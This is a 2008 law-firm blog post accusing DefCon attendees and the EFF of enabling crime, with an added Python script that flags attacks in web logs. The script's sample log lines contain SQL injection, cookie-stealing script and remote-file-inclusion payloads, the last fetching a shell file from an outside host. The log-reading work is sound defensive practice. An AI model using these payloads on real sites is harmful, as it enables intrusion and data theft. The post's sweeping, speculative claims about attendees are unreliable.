August 19, 2008

Dozier Internet Law: Hackers Hack Away at DefCon Annual Convention

DefCon, the annual convention in Las Vegas, began August 8 and it looks like the hackers sitting in the audience and participating in the hacking competitions spent two days trying to hack into the Dozier Internet Law website using SQL injection attacks, Mambo exploits, encoded cross-site scripting attempts, shared-ciphers overflow attempts, and the like. The frustrated perpetrators (they never got access) were sitting in the Riviera Hotel ballrooms, I suspect, listening to the presentations, and participating in the now infamous "free for all" where the attendees hack into systems in an "Olympian-like" competition to gain bragging rights. The attempts likely came through "backdoor" exploits of webservers around the globe. The favorite and most common ISP access was from Vietnam and China, with Beijing the host and doorway of the Olympic Games as well as many, many hackers.
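For readers who administer a site and want to see what the probe types named above look like in an access log, here is an added example (not code from the original post, and not Dozier Internet Law's own tooling) that triages Apache-style log lines for SQL injection, percent-encoded cross-site scripting, and Mambo remote-file-inclusion attempts. The log lines are constructed for the example, the IP addresses are documentation ranges, and the Mambo signature assumes the mosConfig_absolute_path parameter typical of Mambo/Joomla RFI probes of that era, since the post does not say which Mambo exploit was tried. The "shared ciphers overflow" attempts the post mentions happen at the TLS layer and would not show up in an HTTP access log, so they are not covered here.

```python
"""Triage of web-server access logs for SQLi, encoded XSS and Mambo RFI probes.

Added example, not code from the original post. All log lines are
constructed; the Mambo signature (mosConfig_absolute_path) is an assumed,
typical RFI pattern because the post does not name the exploit used.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [09/Aug/2008:03:12:44 -0700] "GET /index.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [09/Aug/2008:03:12:45 -0700] "GET /index.php?id=1%20UNION%20SELECT%20username,password%20FROM%20users-- HTTP/1.1" 500 312 "-" "Mozilla/4.0"
198.51.100.23 - - [09/Aug/2008:03:15:02 -0700] "GET /index.php?option=com_content&mosConfig_absolute_path=http://198.51.100.23/shell.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
198.51.100.23 - - [09/Aug/2008:03:15:09 -0700] "GET /search.php?q=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 1840 "-" "libwww-perl/5.805"
192.0.2.55 - - [09/Aug/2008:03:20:11 -0700] "GET /about.html HTTP/1.1" 200 7021 "-" "Mozilla/5.0"
192.0.2.55 - - [09/Aug/2008:03:20:15 -0700] "GET /contact.php?name=O%27Brien HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures are matched against the *decoded* request path so that
# percent-encoding (single or double) does not hide the payload.
SIGNATURES = {
    "sqli": re.compile(r"('\s*(or|and)\s*'?\d|union\s+select|--\s*$|;\s*drop\s)", re.I),
    "xss": re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I),
    # Assumed Mambo RFI pattern: config path pointed at a remote URL.
    "mambo_rfi": re.compile(r"mosConfig_absolute_path\s*=\s*(https?|ftp):", re.I),
}


def decode(path, rounds=3):
    """Undo up to `rounds` layers of percent-encoding; stop once stable."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def classify(line):
    """Return (ip, decoded_path, [matched signature names]) or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = decode(m.group("path"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(path)]
    return m.group("ip"), path, hits


def triage(log_text):
    """Count hits per (source IP, signature); benign lines contribute nothing."""
    counts = Counter()
    for line in log_text.splitlines():
        result = classify(line)
        if result is None:
            continue
        ip, _, hits = result
        for name in hits:
            counts[(ip, name)] += 1
    return counts


if __name__ == "__main__":
    for (ip, sig), n in sorted(triage(SAMPLE_LOG).items()):
        print(f"{ip:15} {sig:10} {n}")
```

The apostrophe in the `O%27Brien` line is the point of the last sample: a naive filter on `'` alone would flag a legitimate surname, so the SQL injection signature looks for the quote in combination with a boolean operator, a UNION, or a comment terminator. Signature lists like this are a triage aid for reading logs after the fact, not a substitute for parameterized queries and output encoding in the application itself.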

The Electronic Frontier Foundation staffed a booth full of lawyers to help hackers deal with "bogus legal threats" (the EFF's own words). While attending to their session presentations, offering advice, and driving the underworld of the web to the annual EFF fundraiser, they were losing big time in Court. Then the EFF filed legal documents, released press releases, and held news conferences in which they claimed DefCon attendees are akin to "security researchers" that are gathered in Vegas to listen to presentations involving security.

That's absurd. The graph above shows what these hackers do. They come to Vegas to learn how to hack into systems and create havoc. Going after law firm websites and administration areas that contain attorney/client protected communications and documentation, and even court ordered "sealed" files, is a direct attack on the integrity of the judicial process and the judiciary. And our experience at Dozier Internet Law is just the tip of the iceberg.

This convention wouldn't even exist if the FBI, CIA, Department of Justice, National Security Agency, and others weren't so anxious to infiltrate it every year for intelligence. Think about it. Hackers from around the world come together once a year and learn how to hack better. Those that support and encourage and facilitate these hackers cannot hide behind the "I didn't know they were hacking while I spoke" defense. Yes, there are researchers and intellectuals and law students and college professors in attendance. But, for the most part, there are hackers learning and improving their trade. And despite EFF's absurd contentions otherwise, the Computer Fraud and Abuse Act, as well as many state computer crime statutes, can and should be used to prevent the aiding and abetting that is the core benefit seen by most attendees.

"SECURITY RESEARCHERS"? Give me a break, Electronic Frontier Foundation. While your lawyers call the hacking laws "bogus", and tell hackers how they can ignore the "bogus" laws, all of the scofflaws are being emboldened by your advice and guidance. The only reason there isn't a round up and indictments for hacking, conspiracy and aiding and abetting is because your annual conference is infiltrated so extensively by the government that it provides a honeypot of intelligence. And adding some professors and other intellectuals to the mixing pot won't clean things up.

Notice to EFF: DefCon is for hackers. Many attendees commit criminal acts while in attendance in organized war games. Others commit criminal acts as they learn the tools of the trade in the very ballroom during speaker presentations. They hack into banks, into personal computers, into businesses, into government agencies, and steal private information, cost businesses billions of dollars annually, and ruin the financial well-being and impair the emotional stability of individuals all across our country. This is the mob of the 21st century; this is the mobosphere. They are hoodlums, thieves, scoundrels, and all too often already convicted felons after the next easy mark.

The only "security researchers" in attendance, I suspect, are the good guys. But then again, they don't need legal advice from EFF, do they?

8/26/08 Update: There have been some of the 9,000 attendees who have blogged this and defended DefCon by pointing out that there are bad eggs everywhere, and most of the attendees are "good guys".

Anyone can attend, unless, as real-life experience tells us, you are a SPEAKER arrested by the Feds, a REPORTER "outed" by the Conference management and pursued by a mob of attendees, or a registrant intercepted at our border before getting into the US. Couple that with the session this year on how to hack a Boston public transit system and get "free fares for life" (interrupted appropriately by a Federal Court lawsuit and injunction), and the MSBlast Worm and Virus fiasco of several years ago where the Department of Homeland Security had to issue a global alert the day before the conference, and the many, many other incidents that are recorded for posterity online. And then lay on top of that the Electronic Frontier Foundation's prominent and high-profile attendance and involvement at the conference attacking our computer crime laws as "absurd"...laws passed and strengthened post-9/11 by the US Congress.

Are the "good guy" attendees naive? Are they in a state of denial? Are they willing to overlook the "open access" problem in order to keep their employer picking up the tab for three days of partying, fun, gambling etc. in Vegas? Or are they enjoying the short time they have each year being exposed to the "dark side"?

So, here I am, getting feedback from those in the know that I "got it right on". And yes, I agree with some of the feedback I have received...the irony is not lost on me...supposed security professionals operating in an insecure and uncontrollable environment and unable, or unwilling, to recognize a huge and pervasive security risk.

Here are some suggestions: Establish some meaningful vetting of attendees, require full disclosure and contractual commitments, screen out the presentations that rely upon illegal hacking for the subject matter, get rid of the "aliases" used by attendees to hide identities, and act responsibly.